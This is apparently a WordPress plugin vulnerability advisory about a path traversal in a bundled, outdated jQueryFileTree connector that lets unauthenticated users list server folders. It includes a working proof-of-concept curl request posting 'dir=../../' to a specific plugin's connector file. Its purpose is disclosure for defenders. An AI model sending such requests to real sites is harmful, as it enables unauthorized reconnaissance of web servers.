WordPress Plugin Vulnerabilities
Folders Disclosure via Outdated jQueryFileTree Library
Description
The plugins are using the admin-page-framework framework which is shipped with the outdated and no longer maintained library jQueryFileTree known to be affected by a path traversal issue, allowing unauthenticated attackers to disclose the folder structure of the web server
Proof of Concept
curl 'https://example.com/wp-content/plugins/<affected-plugin>/<path-to-jQueryFileTree-lib>/connectors/jqueryFileTreePlus.php' -d "dir=../../" -e "xx" e.g: curl 'https://example.com/wp-content/plugins/revision-manager-tmc/vendor/tmc/admin-page-framework/custom-field-types/path-custom-field-type/connectors/jQueryFileTreePlus.php' -d "dir=../../" -e "xx"
Affects Plugins
References
Classification
Type
TRAVERSAL
OWASP top 10
CWE
CVSS
Miscellaneous
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2022-03-01 (about 2 years ago)
Added
2022-03-01 (about 2 years ago)
Last Updated
2022-04-08 (about 2 years ago)